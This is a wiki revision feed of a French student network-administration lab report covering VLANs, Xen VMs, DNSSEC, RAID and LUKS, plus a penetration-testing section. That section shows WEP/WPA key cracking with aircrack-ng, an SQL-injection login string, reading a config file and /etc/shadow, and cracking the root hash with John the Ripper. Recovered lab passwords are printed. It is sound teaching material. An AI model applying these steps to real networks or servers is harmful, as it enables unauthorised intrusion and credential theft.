5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
=== ASR ===&lt;br /&gt;
&lt;br /&gt;
 xl create -c PRA-07.cfg&lt;br /&gt;
&lt;br /&gt;
 xen console PRA-07&lt;br /&gt;
&lt;br /&gt;
on ajoute dans /etc/network/interfaces :&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 172.26.145.107/24&lt;br /&gt;
  gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Et on commente relatif au DHCP&lt;br /&gt;
on édite /etc/ssh/sshd_config :&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key&lt;br /&gt;
&lt;br /&gt;
on install puthon3-venv sur la zabeth :&lt;br /&gt;
 apt install python3-venv&lt;br /&gt;
on install ansible sur les zabeth :&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57889</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57889"/>
				<updated>2022-01-12T10:06:34Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Intrusion sur un serveur d’application Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
=== ASR ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57783</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57783"/>
				<updated>2022-01-10T17:40:52Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Répartition travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
